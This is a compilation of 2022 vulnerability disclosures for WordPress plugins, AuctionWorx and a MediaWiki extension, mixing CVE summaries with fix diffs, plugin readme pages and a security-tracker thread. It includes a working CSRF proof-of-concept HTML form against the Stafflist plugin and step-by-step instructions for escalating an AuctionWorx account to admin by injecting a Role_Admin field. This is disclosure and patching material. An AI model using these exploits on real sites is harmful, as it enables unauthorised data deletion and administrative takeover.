The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

CVE-2022-0952

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Timestamp:

04/05/2022 12:27:06 PM (4 weeks ago)

isaumya

Message:

Adding nonce support for deletion of banned users  

Location:

ad-invalid-click-protector/trunk/inc

Files:

  

*   admin\_setup.php (1 diff)
*   banned\_user\_table.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **ad-invalid-click-protector/trunk/inc/admin\_setup.php**
    
    r2656496
    
    r2705068
    
     
    
    523
    
    523
    
                $bannedUserTableOBJ = new AICP\_BANNED\_USER\_TABLE();
    
    524
    
    524
    
                $aicpOBJ = new AICP();
    
    525
    
     
    
                if( 'delete'=== $bannedUserTableOBJ->current\_action() ) {
    
    526
    
     
    
                    global $wpdb;
    
    527
    
     
    
                    $fetchedID = $\_REQUEST\['id'\];
    
    528
    
     
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
    529
    
     
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
    530
    
     
    
                    } else { //for singel delete just the id will return
    
    531
    
     
    
                                $selectedID = '%d';
    
    532
    
     
    
                    }
    
    533
    
     
    
                    if( empty( $selectedID ) ) {
    
    534
    
     
    
                        $this->delete\_notice( false );
    
    535
    
     
    
                    } else {
    
    536
    
     
    
                        $query = $wpdb->prepare(
    
    537
    
     
    
                                    "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
    538
    
     
    
                                    $fetchedID
    
    539
    
     
    
                                );
    
    540
    
     
    
                        $wpdb->query( $query );
    
    541
    
     
    
                        $this->delete\_notice( true );
    
    542
    
     
    
                    }
    
    543
    
     
    
                }
    
    544
    
     
    
                /\* End of handelling the deletion process \*/
    
    545
    
     
    
                /\* Now it's time to show our data \*/
    
     
    
    525
    
                if( ( 'delete'=== $bannedUserTableOBJ->current\_action() ) && isset( $\_REQUEST\['nonce'\] ) && wp\_verify\_nonce( $\_REQUEST\['nonce'\], 'delete\_banned\_user' ) ) {
    
     
    
    526
    
                    global $wpdb;
    
     
    
    527
    
                    $fetchedID = $\_REQUEST\['id'\];
    
     
    
    528
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
     
    
    529
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
     
    
    530
    
                    } else { //for singel delete just the id will return
    
     
    
    531
    
                        $selectedID = '%d';
    
     
    
    532
    
                    }
    
     
    
    533
    
                    if( empty( $selectedID ) ) {
    
     
    
    534
    
                        $this->delete\_notice( false );
    
     
    
    535
    
                    } else {
    
     
    
    536
    
                        $query = $wpdb->prepare(
    
     
    
    537
    
                            "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
     
    
    538
    
                            $fetchedID
    
     
    
    539
    
                        );
    
     
    
    540
    
                        $wpdb->query( $query );
    
     
    
    541
    
                $this->delete\_notice( true );
    
     
    
    542
    
                    }
    
     
    
    543
    
                }
    
     
    
    544
    
                /\* End of handelling the deletion process \*/
    
     
    
    545
    
                /\* Now it's time to show our data \*/
    
    546
    
    546
    
                ?>
    
    547
    
    547
    
                <div class="wrap">
    
*   **ad-invalid-click-protector/trunk/inc/banned\_user\_table.php**
    
    r1565011
    
    r2705068
    
     
    
    34
    
    34
    
            public function column\_ip( $item ) {
    
    35
    
    35
    
                $actions = array(
    
    36
    
     
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id ),
    
     
    
    36
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s&nonce=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id, wp\_create\_nonce( 'delete\_banned\_user' ) ),
    
    37
    
    37
    
                );
    
    38
    
    38
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Stafflist 3.1.2 Cross Site Request Forgery

Rainworx Auctionworx < 3.1R2 is vulnerable to a Cross-Site Request Forgery (CSRF) attack that allows an authenticated user to upgrade his account to admin and gain access to the auctionworx admin control panel. This vulnerability affects AuctionWorx Enterprise and AuctionWorx: Events Edition.

**Description:**  Cross-Site Request Forgery  
**Affected Versions:** AuctionWorx Enterprise and Events Edition  <3.1R2  
**CVE ID:** CVE-2022-23904  
**CVSS Score:** 9.0 (High)**  
Fully Patched Version:** v3.1 R2 (Update Rollup)  
**Researcher/s:** Ebere Orisi

**Summary:**

The auctionworx software created by Rainworx Softwares is vulnerable to a Cross-Site Request Forgery attack that allows an authenticated user to upgrade his account to admin and gain access to the auctionworx admin control panel. This vulnerability affects AuctionWorx Enterprise and AuctionWorx: Events Edition.

**Steps to Replicate:**

*   Create an account and login to any of the Rainworx sites listed on https://www.rainworx.com/Clients.
    
*   Go to the My Account page, then Details to update account information. Update account details while intercepting the POST request with a proxy such as OWASP ZAP.
    
*   Add the following field to the request body, before the ‘Save’ field:
    
    *   &Role\_Admin=true&Role\_Admin=false
        

*   After this, logout and login again, then you’ll be granted access to the AuctionWorx admin control panel, where you’ll have access to all User Information, Reports, Billings, Site settings, Product Listings, etc.
    

**Remediation:**

*   Use CSRF Tokens
    
*   Add a hash (session-id, function name, server-side secret) to all forms.
    
*   Blacklist Certain form fields in POST requests
    
*   Allow a certain number of admin accounts on the web application
    
*   Only allow admin access to particular domains
    

**References:**

*   https://owasp.org/www-community/attacks/csrf
    
*   https://www.rainworx.com/AuctionWorx/ReleaseNotes

CVE-2022-23904: Account Privilege upgrade on Auctionworx software (CVE-2022-23904) – Ebere

Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Do you love the demos of the themes made by Rara Theme? Or, need a guideline for setting up the themes?

Then, all you need is this plugin!

Rara One Click Demo Import plugin will help you import the demo content, including settings of the widgets and the customizer, with a click.

The demo content will make your website look like the preview of a theme so that you get a basic guideline for making your website.

Once installed and activated, Rara One Click Demo Import will be accessible through **Appearance > Rara Demo Import**.

If you use Premium themes made by Rara Themes, go to Pro Theme Demo Import tab and just click on ‘Import Now’ button and your website will look like the demo of the activated theme in no time.

If you use free themes made by Rara Themes, download the demo files from your Theme Documentation page, upload it using ‘Upload Demo File’ button on this plugin, and click Import Now. As simple as that.

You can find the detail documentation here

If you need help, contact our support team here.

This plugin is based on the ‘Theme Demo Import’ plugin by Themely, https://wordpress.org/plugins/theme-demo-import/

As well as the improved WP Import 2.0 plugin by @humanmade, https://github.com/humanmade/WordPress-Importer.

**License**

Rara One Click Demo Import uses the script of  
‘Theme Demo Import’ plugin by Themely,  
https://wordpress.org/plugins/theme-demo-import/  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

Rara One Click Demo Import uses ‘WordPress Importer’ plugin script  
https://github.com/humanmade/WordPress-Importer  
(C) 2016 @humanmade  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

**Copyright**

Rara One Click Demo Import is distributed under the terms of the GNU GPL.

This program is free software; you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation; either version 2 of the License, or  
any later version (at your own risk).

This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along  
with this program; if not, write to the Free Software Foundation, Inc.,  
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

**Method 1:**

On your WordPress admin dashboard  
Visit ‘Plugins > Add New’  
Search for ‘RARA One Click Demo Import’ and install the plugin.  
Activate ‘RARA One Click Demo Import ’ from your Plugins page.

**Method 2:**

Download the plugin from WordPress.org repository  
On your WordPress admin dashboard, go to ‘Plugins> Add New> Upload Plugin’.  
Upload the downloaded plugin file (rara-one-click-demo-import.zip) and click ‘Install Now’  
Activate ‘Rara One Click Demo Import’ from your Plugins page.

Once the plugin is activated, you will find the actual import page in **Appearance > Rara Demo Import**

**I have activated the Rara One Click Demo Import plugin. Where can I find the plugin?**

You will find the plugin in _wp-admin -> Appearance -> Rara Demo Import_.

**Where are the demo import files and the log files saved?**

The files used in the demo import will be saved to the default WordPress uploads directory. An example of that directory would be: ../wp-content/uploads/2017/03/.

The log file will be registered in the _wp-admin -> Media_ section.

**I can’t activate the plugin because of a fatal error. What can I do?**

_Update: There is an admin error notice, stating that the minimal PHP version required for this plugin is 5.3.2._

You want to activate the plugin, but this error shows up:

_Plugin could not be activated because it triggered a fatal error_

This happens because your hosting server is using a very old version of PHP. This plugin requires PHP version of at least **5.3.x**, but we recommend version _5.6.x_. Please contact your hosting company and ask them to update the PHP version for your site.

\- Tried several times installing "tour-operator.1.2.5" after installation an extra theme showed up, uninstalled, installed again, two themes total. - Reset WP, install again, same issue. - First import proccess gave error 500. Solved, second try imported demo, but with errors. - Reset WP again, tried multiple times, none of imported anything.

Superfast damage to your site.

Error 503 every time I try to upload demo import file.

don't install this plug! this will be damage to your website and then you must restore your website!

Nice! this plugin is very helpful and easy to use

I recently downloaded the Rara Travel Theme which installed fine. Even though I had read other peoples reviews stating the import does not work. I can state it worked fine for me first time. I am running the latest version of Wordpress as of 25/07/18 with WooCommerce and so far so good no issues. I have even created a Child Theme just in case of future Theme Updates. So don't believe these 1 Star reviews. I am relatively new to Wordpress and I managed just fine. Thank You to the programmer who wrote the Theme and provided the Demo Content all for Free by the way. Really! Thank You!

Read all 7 reviews

“Rara One Click Demo Import” is open source software. The following people have contributed to this plugin.

Contributors

*    Rara Theme

**1.2.9**

*   WORDPRESS 5.6 AND PHP 8 COMPATIBILITY FIXES

**1.2.8**

*   ARRAY OFFSET ACCESS SYNTAX WITH CURLY BRACES FIXED

**1.2.7**

*   LINKS UPDATED

**1.2.6**

*   UPLOAD BUTTON ISSUE FIXED

**1.2.5**

*   INFORMATION ADDED

**1.2.1**

*   COMPATIBILITY TEST

**1.2.0**

*   MAJOR UPDATE
*   DEMO FILE ZIP NAME STANDARDS

**1.1.0**

*   WARNING MESSAGE FIXED

**1.0.9**

*   WARNING MESSAGE FIXED

**1.0.8**

*   CODE CLEAN UP & DESIGN FIXES

**1.0.7**

*   CODE CLEAN UP
*   SOME OPTIONAL FUNCTIONS REMOVED

**1.0.6**

*   DEMO IMPORT PROCESS EASED

**1.0.5**

*   RARA THEME DEPENDENT

**1.0.4**

*   COMPATIBILITY TEST

**1.0.3**

*   PLUGIN DEPENDENCY CHECK
*   COMPATIBILITY TEST

**1.0.2**

*   CODE CLEANUP

**1.0.1**

*   CLASSES ADDED
*   FILTERS ADDED

**1.0.0**

*   INITIAL RELEASE

CVE-2022-29451: Rara One Click Demo Import

Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Subscribe to Comments Reloaded is a robust plugin that enables commenters to sign up for e-mail notification of subsequent entries. The plugin includes a full-featured subscription manager that your commenters can use to unsubscribe to certain posts or suspend all notifications. It solves most of the issues that affect Mark Jaquith’s version, using the latest WordPress features and functionality. Plus, allows administrators to enable a double opt-in mechanism, requiring users to confirm their subscription clicking on a link they will receive via email or even One Click Unsubscribe.

**Requirements**

*   WordPress 4.0 or higher
*   PHP 5.6 or higher
*   MySQL 5.x or higher

**Main Features**

*   Easily manage and search among your subscriptions
*   Imports Mark Jaquith’s Subscribe To Comments (and its clones) data
*   Messages are fully customizable, no poEdit required (and you can use HTML!) with a Rich Text Editor – WYSIWYG
*   Disable subscriptions for specific posts
*   One Click Unsubscribe
*   Get and Download your System information for better support.

**Language Localization**

If you would like to help out translating the plugin to your language you can do so through the official WordPress plugin translation system

1.  If you are using Subscribe To Comments by Mark Jaquith, disable it (no need to uninstall it, though)
2.  Upload the entire folder and all the subfolders to your WordPress plugins’ folder. You can also use the downloaded ZIP file to upload it.
3.  Activate it
4.  Customize the Permalink value under Settings > Subscribe to Comments > Management Page > Management URL. It **must** reflect your permalinks’ structure
5.  If you don’t see the checkbox to subscribe, you will have to manually edit your template, and add <?php global $wp_subscribe_reloaded; if (isset($wp_subscribe_reloaded)){ echo $wp_subscribe_reloaded->stcr->subscribe_reloaded_show(); } ?> somewhere in your comments.php
6.  If you’re upgrading from a previous version, please **make sure to deactivate/activate** StCR.
7.  You can always install the latest development version by taking a look at this Video

**Are there any video tutorials?**

Yeah, I have uploaded a few videos for the following topics:

1.  Issues Updating StCR via WordPress Update
2.  Issues with StCR links see StCR Clickable Links
3.  Issues with empty emails or management messages? see StCR Management Message
4.  Upgrading from the latest development version see Upgrading

**Why my notifications are not in HTML format?**

Don’t worry, just go to the Options tab an set to Yes the **Enable HTML emails** option.

**How can I reset all the plugin options?**

There is a new feature called **Safely Uninstall** that allow you to delete the plugin using the WordPress plugin interface. If you have the option set to **Yes** everything but the subscriptions created by the plugin will be wipeout. So after you made sure that you have this option to **Yes** you can deactivate the plugin and the delete it. Now you have to install the plugin via WordPress or Upload the plugin zip file and activate it, after this step all your settings will be as default and your subscriptions will remain.  
There is a new feature added on the Options tab where you can reset all the settings by using only one click. You can either wipe out all the subscriptions or keep them.

**What can I do if the \*\*Safely Uninstall\*\* does not have any value?**

Just deactivate and activate the plugin and you are all set. The default value will be **Yes**.

**Aaargh! Were did all my subscriptions go?**

No panic. If you upgraded from 1.6 or earlier to 2.0+, you need to deactivate/activate StCR, in order to update the DB structure. After the version 180212 a fix was applied so that you can see all the subscriptions.

**Can I customize the layout of the management page?**

Yes, each HTML tag has a CSS class or ID that you can use to change its position or look-and-feel.

**How do I disable subscriptions for a given post?**

Add a custom field called stcr_disable_subscriptions to it, with value ‘yes’

**How do I add the management page URL to my posts?**

Use the shortcode [subscribe-url], or use the following code in your theme:  
global $wp\_subscribe\_reloaded; if (isset($wp\_subscribe\_reloaded)){ echo ‘Subscribe“;

**Can I move the subscription checkbox to another position?**

Yes! Just disable the corresponding option under Settings > Comment Form and then add the following code where you want to display the checkbox:  
stcr->subscribe\_reloaded\_show(); } ?>

**What if after update to the version 141024 I still see plain HTML messages?**

The information of your configuration needs to be updated. Go to the Subscribe to Comments Reloaded settings and click the Save Changes button on the tab  
where you have you messages with HTML.

**How to generate a new Key for my Site?**

Just go to the Options Panel and click the generate button. By generating a new key you prevent the spam bots to steal your links.

People from my website, who made subscription for comments, said that in e-mail they get the IP of user, who left the comment. I\`m going to find another plugin.

I have the v.210315 I translated it into Italian 100% with Loco translated, but I noticed that in the plugin there are still many entries in English.

Just installed this as an alternative to setting up a forum, which seemed too much like hard work! Love it so far, very easy to set up and I like the fact that every item has a "?" so you can find out what it means before setting it.

Believe me guys, I tried all the plugins out there available for comment subscription and this is the only plugin that is robust, reliable and with continuous support from the author for a very long time. And guess what it's completely free. Thanks a lot for this wonderful plugin. All the best for your great success.

A fabulous plugin that helps people to stay engaged with the posts they appreciate much. Thank you!

If I had written design specs for a plugin and commissioned someone to write it, the result would not have been as good as this plugin is. Setting up this plugin it quickly becomes apparent that a lot of real-world experience has been incorporated into it over the years. The end result is, that it works like a dream and totally exceeds my expectations. Thanks so much!

Read all 156 reviews

“Subscribe To Comments Reloaded” is open source software. The following people have contributed to this plugin.

Contributors

*    WPKube

**v211130**

*   **Fix** Removed custom error handler (thanks to JakeQZ for bringing the issue to our attention)
*   **Fix** Processing form submission in subscribe.php is now stopped in case “subscribe without commenting” is enabled

**v211019**

*   **Fix** Issue with STCR output on non-virtual management page

**v210315**

*   **Fix** Removed the “need help” added via “contextual\_help” (deprecated)
*   **Fix** PHP 8 deprecated notice
*   **Fix** Fix issue with missing submit button when using “stcr\_disable\_subscription” custom field
*   **Tweak** Bump up WP “tested up to” version to 5.7

**v210126**

*   **New** Option to disable the “subscribe without commenting” and “request management link” pages. ( WP Admin > StCR > Management Page )

**v210110**

*   **Fix** Limit subscription types on the management page when only a specific subscription is allowed
*   **Fix** JS error on front-end

**v210104**

*   **New** Google reCAPTCHA now available for the “subscribe without commenting” and “request management subscription” form (WP admin > StCR > Options)
*   **Improvement** When using the checkbox (not the select box from advanced subscription) you can now select the subscription type (all or replies) (WP admin > StCR > Comment Form)
*   **Improvement** \[comment\_author\] can now be used in the Notification subject (WP admin > StCR > Notifications)
*   **Improvement** Replaced final instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Fix** The form to “request management link” will now check if that email is a subscriber before sending a link
*   **Fix** Issue with broken option tooltips on Notifications settings page
*   **Tweak** Removed HTML comments around the plugin’s output on the frontend

**v200813**

*   **Fix** Error when permanently deleting a post/page/… (related to WP 5.5 change in the “delete\_post” hook coming with a 2nd parameter)

**v200629**

*   **New** Option to show the subscription checkbox/select only for logged in users (option called “Enable only for logged in users” and located in WP admin > StCR > Options)
*   **New** Added \[comment\_date\] and \[comment\_time\] shortcodes which can be used in the “notification message”.
*   **Improvement** Challenge question/answer now shows on “request management link” page as well
*   **Improvement** Replaced multiple instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Tweak** Added label for the checkbox in “Screen Options”
*   **Tweak** Email input value fallback to “email” removed
*   **Fix** Subscriptions will no longer duplicate when post is copied/duplicated with the “Duplicate Post” plugin
*   **Fix** Fixed issue with PHP notice when $comment object does not have comment\_approved set
*   **Fix** The jQuery code that handles moving the position of the checkbox is now added later on in the code to avoid issue when jQuery gets loaded in the footer

**v200422**

*   **New** Arabic translation, thanks to Yaser Maadan
*   **Fix** WP\_PLUGIN\_URL replaced by plugins\_url()
*   **Fix** Issue with “generate new key” button for “StCR Unique Key” not working (WP Admin > StCR > Options)
*   **Fix** Issue with ordering by date in the subscription management table (WP Admin > StCR > Manage subscriptions)
*   **Fix** Issue with management page ( /comment-subscriptions/ ) being shown for child pages as well ( /comment-subscriptions/something-else/ )
*   **Fix** Corrections in Hungarian translation
*   **Tweak** Some other minor tweaks

**v200205**

*   **New** Function for developers to add subscribers. Check the guide
*   **New** Option to set a challenge (question + answer) for the “subscribe without commenting” form to prevent automatic bot submissions
*   **Fix** It is now possible to send out plain text emails instead of HTML emails. Check the guide
*   **Fix** It is now possible for visitors to subscribe to comments when the comments are only open for logged in users and the visitor is not logged in
*   **Fix** Corrections in German translation

**v191217**

*   **Improvement** Option to enable/disable the plugin from setting cookies (email address after subscription)
*   **Improvement** German translation improvements (thanks to Greendroid)

**v191209**

*   **Improvement** Logged in users no longer need to submit the “email” form on a subscription page in order to access their subscriptions
*   **Improvement** Ability to filter/search the subscriptions table ( WP admin > StCR > Manage Subscriptions ) when there are more than 1000 subscriptions

**v191028**

*   **Fix** Issue with “Default Checkbox Value” not being saved
*   **Fix** Issue with /comment-subscriptions taking to 404 ( when it does not end with / )
*   **Tweak** Error notification when \[manager\_link\] used in “Management Page message”.

**v191011**

*   **Fix** Revert changes to error logging due to PHP errors/warnings

**v191009**

*   **Fix** Issue with post slug being displayed instead of the post title on unsubscribe
*   **Fix** HTML validation error in subscribe template
*   **Fix** Fix German translation “Nicht abonnieren”
*   **Fix** Fix import data from Subscribe Reloaded by Mark Jaquith
*   **Fix** Issue with using double quotes in options
*   **Tweak** Show a message to the comment author to check his email to confirm subscription
*   **Tweak** Performance improvement for error logging

**v190529**

*   **Fix** Issue with being unable to dismiss admin notices shown by StCR
*   **Fix** Virtual management page was still being shown even when disabled

**v190523**

*   **Fix** Remove the old system information functionality

**v190510**

*   **New** Option to only enable the functionality for blog posts ( option named “Enable only for blog posts” located in WP admin > StCR > StCR Options)
*   **Tweak** Info on subscriber and subscriptions amount moved into separate table
*   **Fix** Text domain

**v190426**

*   **New** Info on the amount of subscribers and subscriptions added in WP admin > StCR > StCR System
*   **Fix** Text domain (for translations) has been changed to the correct domain (from subscribe-reloaded to subscribe-to-comments-reloaded)
*   **Fix** Issue with undefined is\_rtl function
*   **Fix** Missing blank space between sentences (below comment form when subscribed)
*   **Fix** Undefined variable notices for $order\_status and $order\_dt
*   **Fix** Temporarily hidden an unused option in StCR > Management Page to avoid confusion.
*   **Fix** Removed localization for non textual strings
*   **Fix** Fixed incorrectly localized textual strings

**v190412**

*   **Fix** Issue with JavaScript code that is supposed to show the form when “StCR Position” is enabled

**v190409**

*   **Fix** Post author was notified of new comments even if they are awaiting approval, no need for this since WordPress itself sends out an email in that case
*   **Fix** Post author was notified twice ( if he was subscribed and “subscribe authors” was enabled )
*   **Fix** Issue with “StCR Position” option ( for older/outdated themes ) not working properly
*   **Fix** Issue with wrong translation in German
*   **Tweak** The “Action” select box labels on “Manage Subscriptions” page tweaked to be more descriptive

**v190325**

*   **New** Shortcode for manage page content (to be used on non-virtual management page). The shortcode is \[stcr\_management\_page\]
*   **Rewrite** New method for downloading system information file
*   **Fix** The admin panel CSS and JavaScript files now load only on StCR pages
*   **Fix** Tooltips not showing up on System options page
*   **Fix** Conflict with MailChimp for WP plugin (comment filter received echo instead of return which caused the issue)
*   **Fix** Issue with select/deselect all on management page
*   **Tweak** The MySQL requirements info on the system page now uses WordPress requirements
*   **Tweak** The post author will no longer be notified of his/her own comments

**v190305**

*   **Fix** Issue with “Subscribe authors” functionality sending the emails to administrator instead of the post author

**v190214**

*   **Fix** String error calling the Curl Array.
*   **Fix** wrong array definition that was breaking the site in some newer PHP versions.
*   **Fix** error by calling $wp_locale that was not needed.
*   **Fix** wrong label on option issue #467.
*   **Fix** typo en help description issue #468.

**v190117**

*   **Fix** missing checkbox when the option **StCR Position** was set to **Yes**.
*   **Fix** styles on admin notices.
*   **Fix** filenames to match the correct menu name.
*   **Fix** \# issue#431 and issue#444.
*   **Fix** warning message that was notifying the server when the Management URL was empty. Now the field must have a value. Props @breezynetworks on WordPress Forum
*   **Fix** value of management page to get it on the event insteadof page load.
*   **Add** translation for Subs Table, Add PHP error logger.
*   **Add** Plugin information on Cards.
*   **Add** the Phing build script to automate the deployment and testings.
*   **Add** WebUI Popover library to display the help messages in a clear way.
*   **Add** dropdown menu on the options tab to include the System menu.
*   **Add** option to download the system report.
*   **Add** functionality to create the system report via Ajax.
*   **Add** cron to clean house the system report file.
*   **Upgrade** the **Comment Form** Panel 2 options.
*   **Upgrade** the **Management Page** panel.
*   **Upgrade** the **Options** Panel.
*   **Upgrade** the **Support** Panel.
*   **Upgrade** the **StCR System** Menu.
*   **Update** font awesome refrences.
*   **Update** Admin Menus with Bootstrap.
*   **Implement** Pagination using plugins and fix responsive layout of management page.
*   **Implement** SASS for the CSS files.
*   **Implement** a cache array for the menu options.
*   **Remove** unecessary components from Composer.
*   **Remove** double inclusion of Font Awesome.
*   **Modify** Bower, Gulp and Phing files to implement WebUI Popover.
*   **Refactor** the options saving process.
*   **Refactor** code to move the functional saving options to the Utils Class.
*   **Set** the Double Verification option to yes.
*   **Create** array of options for improve support.
*   **Sanitize** input and out of data preventing XSS. Code modification and suggestion by @jnorell.
*   **Re Word** option to avoid missleading to new users. Props @padraigobeirn.
*   **Move** the plugin core files to the folder **src** in order to implement npm and bower task managers.

**v180225**

*   **Fix** error when a user subscribe to a new post and the double opt-in was enable, preventing the double opt-in not sending the email message. Issue#350.
*   **Add** email and post id validation on the StCR backened.
*   **Add** email, search and post id validation on the frontend.
*   **Add** backened validation for input data (email) on the subscribe and request management pages.
*   **Add** debug messages to improve support.
*   **Add** feature to change the date format output on the management page for both the User page and Author. See issue#345.
*   **Remove** the inclusion of the plugin scripts with WP enqueue. This will load only the needed script on specific pages. Will remove request to the server to get scripts.

CVE-2022-29414: Subscribe To Comments Reloaded

The admin API module in the QuizGame extension for MediaWiki through 1.37.2 (before 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omits a check for the quizadmin user.

**

QuizGame: Administrative API module lets unauthenticated requests through

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

In 88754ee5b7c7f745f1172cf0238f8e65442e1bd0 (27 July 2013 (!)) I converted QuizGame to use an API module instead of the then-deprecated sajax\_\* functions provided by MediaWiki core to make the extension compatible with MediaWiki 1.21.  
The old AJAX entry point, wfQuestionGameAdmin, which despite the name **wasn't** admin-only nor truly intended to be such as it handles flagging, did feature a rudimentary "is the request allowed?" check; but I'm not sure if it really provided any _real_ security. Either way, when creating the API module, even this check was lost.

So right now all the API module really cares about is that:  
1.) The request has a valid anti-CSRF token (new mw.Api().postWithEditToken( ... ) will take care of that)  
2.) The request was POSTed  
3.) The quizaction and id parameters are set and that the former corresponds to one of the actions handled by the module's switch() loop

As long as those requirements are met, an attacker can easily abuse the QuizGame administrative API to their nefarious purposes - quizadmin rights not needed!

Hilariously, though, the UI in /extensions/QuizGame/includes/specials/SpecialQuizGameHome.php **does** perform correct user right checks for the admin panel and whatnot and redirects unauthorized users to the main quiz game landing page.

Quick patch to add block and proper user rights checking to the QuizGame admin API (while allowing all users to flag quizzes):

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..56d5a82 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
                // ApiBase's getDB() supports only slave connections, lame...
                $dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
                switch ( $action ) {
                        case 'unprotectItem':
                                $dbw->update(

*   Mentions

**Event Timeline**

Comment Actions

From 26cab2b8ca3fba27849c7453f48b7f9189e89fc9 Mon Sep 17 00:00:00 2001
From: www-data <www-data@miraheze.org>
Date: Mon, 21 Feb 2022 22:06:16 +0000
Subject: \[SECURITY\] QuizGame: Administrative API module lets
 unauthenticated requests through

\---
 includes/api/ApiQuizGame.php | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/includes/api/ApiQuizGame.php b/includes/api/ApiQuizGame.php
index 3236d7e..081e64e 100644
\--- a/includes/api/ApiQuizGame.php
+++ b/includes/api/ApiQuizGame.php
@@ -34,6 +34,21 @@ class ApiQuizGame extends ApiBase {
 		// ApiBase's getDB() supports only slave connections, lame...
 		$dbw = wfGetDB( DB\_PRIMARY );
 
\+               // Fail early if the user is sitewide blocked.
\+               // (This snippet copied from MW core /includes/api/ApiTag.php)
\+               $block = $user->getBlock();
\+               if ( $block && $block->isSitewide() ) {
\+                       $this->dieBlocked( $block );
\+               }
+
\+               // Allow non-quizadmins to use the flagging feature but require quizadmin
\+               // rights for all other stuff
\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }
+
 		switch ( $action ) {
 			case 'unprotectItem':
 				$dbw->update(
\-- 
2.30.2

didn't apply for me, ended up working with sudo -u www-data git apply --ignore-space-change --ignore-whitespace ~/quizgame.patch

That's the new patch file

Comment Actions

The patch looks correct to me, +2. One nit:

\+               if ( $action !== 'flagItem' ) {
\+                       if ( !$user->isAllowed( 'quizadmin' ) ) {
\+                               $this->dieWithError( 'badaccess-group0' );
\+                       }
\+               }

These two if blocks can be merged: if ( $action !== 'flagItem' && !$user->isAllowed( 'quizadmin' ) ).

(Aso in the future it's better to post patches as attachments generated with git format-patch HEAD~1, so that any weird whitespace, etc. are preserved.)

Also, also, I noticed that SpecialQuizGameHome is checking for \*any\* block, not a sitewide block. That can be fixed publicly, I just looked because you mentioned it implemented the checks correctly.

ashley closed this task as Resolved.Mar 28 2022, 5:13 PM

Comment Actions

